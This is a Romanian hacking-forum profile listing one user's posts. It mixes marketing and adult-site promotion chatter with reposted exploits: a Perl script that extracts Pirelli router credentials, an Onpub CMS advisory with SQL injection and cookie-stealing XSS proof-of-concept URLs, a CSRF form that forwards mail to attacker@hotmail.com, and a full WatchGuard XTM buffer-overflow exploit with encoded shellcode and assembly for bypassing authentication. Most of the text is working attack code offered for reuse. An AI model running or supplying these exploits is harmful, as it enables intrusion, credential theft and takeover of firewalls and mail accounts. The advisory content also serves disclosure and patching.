-
Posts
1576 -
Joined
-
Last visited
-
Days Won
9
Posts posted by Gonzalez
-
-
Ce zici de $30 - 35 pentru site?
-Gonzalez
-
Iata versiunea 1.4.4
Download:
http://www.filedropper.com/eah144
La mine face cateva figuri, dar merge.
-
1
-
-
Se vinde scriptul AVS 3.3 (Adult Video Script 3.3) + branding free option.
Mai multe informatii despre script:
http://www.adultvideoscript.com/
Pret: $100
Plata: Paypal
-
-
Ceva ceva:
Download video adult -> urci pe xvideos/pornhub cu titlul clipului urmat de domeniul tau. Sau bagi watermark in clip.
Site-uri de torrente -> urci clipul cu watermark
La xhamster nu accepta watermark-uri -> pui un clip de cateva secunde cu domeniul tau in fata si in spatele clipului tau (cum face brazzers) dar nu pui watermark.
Reteaua pornhub si brazzers are acelasi owner: mindgeek.com - din cate stiu.
-
How I make 1k thru Freelancing
/make-1k-on-the-side-thru-freelancing/?couponCode=UdemyStudioFans
How I Got My Book to #1 on Amazon with ZERO Marketing $$
/how-i-got-my-book-to-1-on-amazon-with-zero-marketing/?couponCode=UdemyStudio
-
Mai lucreaza la photoshop skills.
-Gonzalez
-
Nota 10 pentru Alezu2000.
Are experienta cu suita Adobe si lucreaza si rapid. Poti comunica cu el pe Skype sau Email.
Il recomand pe Alezu2000 la prieteni si clientii mei tot timpul.
-Gonzalez
-
1
-
-
Salut baieti,
Caut pe cineva dedicat si este interesat sa lucreze de acasa.
Ne vei ajuta la promovarea site-ului prin diferite feluri, te voi invata personal.
Este recomandat:
- PC - experienta buna
- Conextiune internet buna (10Mbit+)
- dedicat pentru lucru
Timpul de lucru este de 6 ore pe zi, in fiecare zi inafara de duminica.
Plata se face in fiecare saptamana via PayPal - $65 USD
PS: unele site-uri contin material pentru adulti.
Multumesc si astept un PM de la doritori.
-
1
-
-
Metallica - All Nightmare Long
-
URL:
https://tresorit.com/
Mult noroc baieti!
-Gonzalez
-
Nu as crede ca e al tau blogul, e a lui indian. Ehh, daca nu te dai tu indianul ala.
Clickbank + list building.
-
Deci trebuie sa invatati programare, lasati hackul si alte vrajeli care va distrag atentia. Puteti sa invatati singuri pe internet, asa au facut majoritatea.
-Gonzalez
-
C++
-Gonzalez
-
E buna metoda, dar trebuie sa ai si o relatie cu subscriberi, sa ii intrebi despre problemele lor si sa comunici cu ei, nu doar sa trimiti produsele tale sau de la clickbank, iar ei sa cumpere. Just my opinion.
-Gonzalez
-
Bun venit pe RST!
-Gonzalez
-
Ubuntu all the way.
-Gonzalez
-
-
Guccifer lol
-Gonzalez
-
1
-
-
#!/usr/bin/perl
#Author: Sebastián Magof
#Vulnerable file: wansinglecfg.cmd
#Bug: Password Disclosure
# (\/)
# (**) ?lpha
#(")(")
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
#begin
print "\n\n*******************************************************\n";
print "* Pirelli Discus ADSL DRG A125g password disclosure *\n";
print "*******************************************************\n\n";
print "[+] Type your Gateway. (#default gateway 10.0.0.2) : "; #10.0.0.2 default Gateway
$gateway =<STDIN>;
#pwd disclosure file
my $url = "http://$gateway/wansinglecfg.cmd?action=view";
#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");
#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($usr) = $content =~ m/frmLoad\('(.+)', '/;
my ($pwd) = $content =~ m/$usr', '(.+)',/;
#usr+pwd;
print "User: $usr\nPassword: $pwd\n\n";
exit(0);
__EOF__-Gonzalez
-
Document Title:
===============
Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1120
Release Date:
=============
2013-10-26
Vulnerability Laboratory ID (VL-ID):
====================================
1120
Common Vulnerability Scoring System:
====================================
8.2
Product & Service Introduction:
===============================
Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub`s default
design and functionality via open-standard web development tools and techniques.
Onpub is ideal for those with no desire to implement a CMS from scratch, but still need a custom, yet agile solution.
Onpub tightly integrates many widely used third-party web apps and scripts in to one coherent system to build further upon.
( Copy of the Vendor Homepage: http://onpub.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application.
Vulnerability Disclosure Timeline:
==================================
2013-10-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Onpub
Product: Onpub - Content Management System 1.4 Lite and 1.5
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
Multiple remote sql injection web vulnerabilities are detected in the official in the Onpub v1.4 and 1.5 Content Management System web-application.
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms.
The sql injection vulnerabilities are located in the `websiteID`,`imageID`,`keywords`,`orderBy`,`order` and `articleID` values of the index.php file.
Remote attackers are able to inject own sql commands via GET method request to compromise the database management system or cms web-application.
The inject can be done by usage of the manage path via GET method request or by usage of the articleID in the index.php file POST method request.
The severity of the remote sql injection bugs is estimated as critical.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.
Vulnerable Module(s):
[+] Manage
Vulnerable File(s):
[+] index.php
Vulnerable Parameter(s):
[+] websiteID
[+] imageID
[+] keywords
[+] orderBy
[+] order
[+] articleID
2.1
A client-side post inject web vulnerability is detected in the official in the Onpub v1.4 and v1.5 Content Management System web-application.
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side).
The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module).
Remote attackers can manipulate the `page` parameter in the `index.php` file via GET method request to compromise client-side application context.
Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing,
client-side unauthorized external redirects and client-side manipulation of the contact formular module context.
Vulnerable Module(s):
[+] Manage
Vulnerable File(s):
[+] index.php
Vulnerable Parameter(s):
[+] page
Proof of Concept (PoC):
=======================
1.1
The sql injection web vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction.
For demonstration or to reproduce ...
PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION VULNERABILITY!]&order=ASC
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&orderBy=title&order=[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImage&imageID=2%27a[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticle&articleID=1%20[SQL-INJECTION VULNERABILITY!]
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@version--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@database--
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@user--
2.1
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account
and with low user interaction click. For demonstration or to reproduce ...
PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=2%27%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=137%20>"<iframe%20src=http://www.vulnerability-lab.com>
Solution - Fix & Patch:
=======================
1.1
Parse in the index.php file the vulnerable `websiteID`,`imageID`,`keywords`,`articleID`,`orderBy`,`order` parameters.
Use the mysql_real_escape_string() or a prepared statement to prevent sql injection attacks.
2.1
Parse or encode the vulnerable page parameter in the index.php file to prevent client-side cross site scripting attacks.
Security Risk:
==============
1.1
The security risk of the remote sql injection web vulnerabilities are estimated as critical.
1.2
The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Marcel Bernhardt (smash@evolution-sec.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com-Gonzalez
-
#############################
Exploit Title : Multiple CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/25/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail
#############################
GroupWare Web mail Edition
Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project
##########################
CSRF Location
Several functionalities from Rules section were found to miss the token so as to prevent CSRF
##########################
POC
A <body>
<form action="...../horde/ingo/basic.php?page=rule" method="POST">
<input type="hidden" name="actionID" value="rule_save" />
<input type="hidden" name="conditionnumber" value="-1" />
<input type="hidden" name="name" value="TestingCSRF" />
<input type="hidden" name="combine" value="1" />
<input type="hidden" name="field[0]" value="From" />
<input type="hidden" name="match[0]" value="contains" />
<input type="hidden" name="value[0]"
value="test@hotmail.com" />
<input type="hidden" name="field[1]" value="" />
<input type="hidden" name="action" value="4" />
<input type="hidden" name="actionvalue"
value="attacker@hotmail.com" />
<input type="hidden" name="stop" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
These were found at:
* Creating a rule
* Updating
* Enabling
(http://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=2&actionID=rule_enable)
* Deleting ( url-based https://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=6&actionID=rule_delete)
###########################
CVE identifier
CVE-2013-6275.
##########################
Vendor Notification
10/25/2013 to: the developers. They replied immediately and fixed the problem launching a patch: http://bugs.horde.org/ticket/12796
10/28/2013: Disclosure-Gonzalez
-
#!/usr/bin/perl -w
# Exploit Title: WatchGuard Firewall XTM version 11.7.4u1 - Remote buffer overflow exploit ~ sessionid cookie
# Date: Oct 18 2013
# Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com)
# Vendor Homepage: http://www.watchguard.com
# Version: <= 11.7.4u1
# Tested on: XTMv
# CVE : CVE-2013-6021
=header
*********************************************************************
** WatchGuard Firewall XTM version 11.7.4u1 **
** Remote buffer overflow exploit ~ sessionid cookie **
*********************************************************************
** **
** Author: jerome.nokin@gmail.com **
** Blog: http://funoverip.net **
** CVE: CVE-2013-6021 **
** **
*********************************************************************
** **
** - Bug, exploit & shellcode details available on: **
** http://funoverip.net/?p=1519 **
** **
** - Decoded shellocde can be found at the end of this file **
** **
*********************************************************************
=cut
=output sample
[*] Sending HTTP ping request to https://192.168.60.200:8080 : OK. Got 'pong'
[*] Checking sessionid cookie for bad chars
[*] Checking shellcode for bad chars
[*] Heap messaging (request 1) : ...
[*] Sending authentication bypass shellcode (request 2)
[*] HTTP Response :
--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014
Date: Sun, 27 Oct 2013 21:11:38 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>6B8B4567327B23C6643C98696633487300000014</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
--------------------------------------------------------------------------------
[*] Over.
=cut
use warnings;
use strict;
use IO::Socket::SSL;
# host and port of the XTM web console
my $host = "192.168.60.200";
my $port = "8080";
# Shellcode (watch out bad chars)
my $shellcode =
# shellcode: bypass password verification and return a session cookie
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQ" .
"KusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUX" .
"eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" .
"9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" .
"RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" .
"sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" .
"ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" .
"benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" .
"LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A";
# Shellocde max length
my $shellcode_max_len = 2000;
# set our shellcode address into EAX (expected by alpha2 encoder)
my $alpha2_ecx24 =
"\x8b\x41\x24" . # mov eax, [ecx+0x24]
"\x29\xd0" . # sub eax, edx ; (edx is updated by nopsled)
"\x83\xc0\x40" . # add eax, 0x40
"\x83\xe8\x35"; # sub eax, 0x35
# for the reader, "add eax, edx" contains bad chars.
# This is the reason why the nopsled decrement EDX and that we use "dec eax, edx"
# flush after every write
$| = 1;
# HTTP POST data for authentication request
my $login_post_data =
"<methodCall><methodName>login</methodName><params><param><value><struct><member>" .
"<name>password</name><value><string>foo</string></value></member><member>" .
"<name>user</name><value><string>admin</string></value></member></struct></value>" .
"</param></params></methodCall>";
# list of bad characters
my @badchars = (
"\x00",
"\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a",
"\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13",
"\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c",
"\x1d", "\x1e", "\x1f",
"\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters
);
# function: Check input for badchars.
sub check_badchars {
my $in = shift;
my $stop = 0;
for(my $i=0; $i<length($in); $i++){
my $c = substr($in,$i,1);
if($c ~~ @badchars){
printf " - bad char '0x%02x' found\n", ord($c);
$stop = 1;
}
}
if($stop){ exit; }
}
# function: testing remote connectivity with the appliance
# send HTTP "ping" request and expect "pong" reply
sub testing_connectivity {
print "[*] Sending HTTP ping request to https://$host:$port : ";
my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";
if($sock){
my $req =
"GET /ping HTTP/1.0\r\n" .
"Host:$host:$port" . "\r\n" .
"\r\n";
# send ping
print $sock $req;
my $resp='';
my $pong = 0;
# read answer
while (my $line = <$sock>){
if($line =~ /pong/) { $pong = 1;}
$resp .= $line;
}
# got pong ?
if($pong){
print "OK. Got 'pong'\n";
}else{
print "ERROR. Expecting 'pong' response but received :\n";
print $resp;
exit;
}
close $sock;
}else{
print "ERROR: Socket failed !\n";
exit;
}
}
# function: HTTP request used for HEAP messaging phase
sub building_request_step1 {
my $sessionid = "A" x 120; # do not overflow now
my $req =
"POST /agent/ping HTTP/1.1\r\n" .
"Host:$host:$port" . "\r\n" .
"User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 " . "a" x 100 . "\r\n" .
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" .
"Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" .
"Cookie: sessionid=" . $sessionid . "\r\n" .
"Accept-Charset: utf-8\r\n" .
"Content-Type: application/xml\r\n" .
"Content-Length: 3\r\n" .
"\r\n" .
"foo" ;
return $req;
}
# function: HTTP request used for buffer overflow exploitation
sub building_request_step2 {
my $sessionid =
"A" x 140 . # junk
"\x44\x85" ; # off by 2 overflow to reach 0x8068544 (on the heap).
# 0x8068544 contains a "good memory chunk" which satisfy all rules
print "[*] Checking sessionid cookie for bad chars\n";
check_badchars($sessionid);
my $req =
"POST /agent/ping HTTP/1.1\r\n" .
"Host:$host:$port" . "\r\n" .
"User-Agent: " . "a" x 1879 . "\r\n" .
"Connection: keep-alive" . "a" x 22 .
"\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24)) . # nops
$alpha2_ecx24 . # set EAX to shellcode addr
$shellcode . # shellcode
"\r\n" .
"Accept-Encoding: identity," . "b" x 1386 . "\r\n" .
"Cookie: sessionid=" . $sessionid . "\r\n" .
"Accept-Charset: utf-8\r\n" .
"Content-Type: application/xml\r\n" .
"Content-Length: " . length($login_post_data). "\r\n" .
"\r\n" .
$login_post_data ;
return $req;
}
# function: Send an HTTP request.
sub send_http_request {
my $req = shift;
my $read_answer = shift || 0;
my $http_resp='';
# Open socket
my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!";
if($sock){
print $sock $req;
# do we need the answer ?
if ($read_answer){
my $is_chunked = 0;
my $is_body = 0;
while(my $line = <$sock>){
if($line =~ /Transfer-Encoding: chunked/){
$is_chunked = 1;
next;
}
if($line eq "\r\n"){
# we reached the body
if($is_chunked){
$line = <$sock>; # chunk length
$line =~ s/\r\n//g;
$sock->read(my $data, hex($line)); # read chunk
$http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line);
$http_resp .= $data;
close $sock ;
return $http_resp;
}
}
$http_resp .= $line;
}
}
close $sock;
}else{
print "ERROR: Socket failed !\n";
exit;
}
return $http_resp;
}
### MAIN ####
# print banner
print << 'EOF';
**********************************************************
** WatchGuard Firewall XTM version 11.7.4u1 **
** Remote buffer overflow exploit ~ sessionid cookie **
**********************************************************
** **
** Author: jerome.nokin@gmail.com **
** Blog: http://funoverip.net **
** CVE: CVE-2013-6021 **
** **
**********************************************************
** **
** Bug, exploit & shellcode details available on: **
** http://funoverip.net/?p=1519 **
** **
**********************************************************
EOF
# Send an HTTP ping request
testing_connectivity();
# building HTTP requests
my $request_step1 = building_request_step1();
my $request_step2 = building_request_step2();
# Testing shellcode against bad cahrs
print "[*] Checking shellcode for bad chars\n";
check_badchars($shellcode);
# Fillin the heap
print "[*] Heap messaging (request 1) : ";
for(my $i=0 ; $i<3 ; $i++){
send_http_request($request_step1);
print ".";
}
print "\n";
# Exploiting
print "[*] Sending authentication bypass shellcode (request 2)\n";
my $resp = send_http_request($request_step2,1);
print "[*] HTTP Response : \n\n";
print "-" x 80 . "\n";
print $resp;
print "-" x 80 . "\n\n";
print "[*] Over.\n";
exit;
=shellcode
;------------------------------------------------
; shellcode-get-gession.asm
; by Jerome Nokin for XTM(v) 11.7.4 update 1
;------------------------------------------------
global _start
_start:
; current EBP/ESP values
;-------
; esp 0x3ff0b518
; ebp 0x3ff0b558
; first, fix the stack in HTTP_handle_request function
; -------
; esp 0x3ff0b6f0
; ebp 0x3ffffcb8
; we'll do
;---------
;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472'
; 3ff0b6f0
; ESP = ESP + 472
;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312'
; 3ffffcb8
; EBP = EBP + 1001312
; fix ESP/EBP
add esp, 472
add ebp, 1001312
; fixing overwritten ptrs
; finding initial malloc pointer v50 (overwritten)
; 0805f000-08081000 rwxp 00000000 00:00 0 [heap]
; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14)
; example inside gdb
;b *0x8051901
;b *0x80519c0
;(gdb) x/xw $ebp-0xf8 <===== v55
;0x3ffffbc0: 0x08065b90
;(gdb) x/xw $ebp-0xfc <===== v54
;0x3ffffbbc: 0x08067fe0
;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90 <==== search seq on heap
;0x8063b48
;1 pattern found.
;(gdb) x/xw 0x8063b48-0x10 <==== initial malloc ptr (v50) is at 0x8063b48-0x10
;0x8063b38: 0x00000001
; search this sequence on the heap
mov eax, [ebp-0xfc] ; v54
mov ebx, [ebp-0xf8] ; v55
mov edi, 0x0805f000 ; heap start addr
loop:
add edi, 4
lea esi, [edi+4]
cmp esi, 0x08081000 ; edi is out of the heap ?
je loop_end
cmp [edi], eax ; cmp v54
jne loop
cmp [edi+4], ebx ; cmp v55
je found
jmp loop
loop_end:
mov eax, 0x08063b38 ; default value (should not be reached)
found:
lea eax, [edi-0x10] ; eax = v50 address (malloc ptr addr)
; EBP-0x10c
; saved content of v50 (malloc) = ebp-0x10c
mov [ebp-0x10c], eax
; reset EBX (see following)
; 805185c: e8 95 43 00 00 call 8055bf6 <wga_signal+0x784>
; 8051861: 81 c3 93 c7 00 00 add ebx,0xc793
; ....
; 8055bf6: 8b 1c 24 mov ebx,DWORD PTR [esp]
; 8055bf9: c3 ret
mov ebx, 0x805dff4
; EBP-0x108
; just reset it to 0
mov dword [ebp-0x108], 0x0
; EBP-0x100
; 80519b1: 8b 40 0c mov eax,DWORD PTR [eax+0xc]
; 80519b4: 89 85 00 ff ff ff mov DWORD PTR [ebp-0x100],eax
mov eax, [eax+0xc]
mov [ebp-0x100], eax
; simulate call to login function. copy args
mov ecx, [ebp-0x10c]
mov eax, [ebp-0x198]
mov edx, [ebp-0x194]
mov [esp+0x4],eax
mov [esp+0x8],edx
mov [esp],ecx
; Now setup the login function stack
; current esp/ebp
; ----------------
; esp 0x3ff0b6f0
; ebp 0x3ffffcb8
; we want to land into the login function
; ---------------------------------------
; esp 0x3ff0b420
; ebp 0x3ff0b6e8
; we'll do
;---------
; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720'
; 3ff0b420
; ESP = ESP - 720
; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912'
; 3ff0b6e8
; EBP = EBP - 1000912
; stack fix
sub esp, 720
sub ebp, 1000912
; EBX -> .GOT (same as above btw)
mov ebx, 0x805dff4
; simulate "decode HTTP content" fct, at top of the login function
mov edx, [ebp+0x8]
mov edx, [edx+0x8]
mov dword [esp+0x4], 0x0 ; no content_encoding header
mov [esp], edx
mov esi, 0x0804d990
call esi ; decode content
mov [ebp-0x70],eax ; int decoded_content; // [sp+258h] [bp-70h]@1
; simulate "search remote_address"
mov eax, [ebp+0x8]
mov eax, [eax+0x14]
mov [esp+0x4],eax
lea eax,[ebx-0x3ceb]
mov [esp],eax
mov esi, 0x804b670 ;FCGX_GetParam
call esi
add eax, 0x7 ; remove '::ffff:' ====> to improve
mov [ebp-0x60], eax
; is_admin = 4
mov dword [ebp-0x48], 0x4
; simulate "search req_user value"
mov eax, [ebp-0x70]
mov eax, [eax+0x50]
mov dword [esp+0x8],0x0
lea edx,[ebx-0x3c93]
mov [esp+0x4],edx
mov [esp],eax
mov esi, 0x804c07e
call esi ; <FCGX_PutStr@plt+0x3de>
mov [ebp-0x68],eax
; v49 = 2 (ipv4)
mov word [ebp-0x5a], 0x2 ; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1
; challenge
mov dword [ebp-0x6c], 0x0 ; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1
; set v43 to null
mov dword [ebp-0x74], 0x0 ;int v43; // [sp+254h] [bp-74h]@1
; ok, we are ready to jump in the middle of the "login" function
; right after the password verification
; jump here
; 804ee4b: c7 44 24 04 00 12 00 mov DWORD PTR [esp+0x4],0x1200
; 804ee52: 00
; 804ee53: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1
; 804ee5a: e8 11 c4 ff ff call 804b270 <calloc@plt>
mov edi, 0x804ee4b
jmp edi
=cut-Gonzalez
-
Cacati = NSA
-Gonzalez
ProtonMail
in Linkuri
Posted
ghostmail.com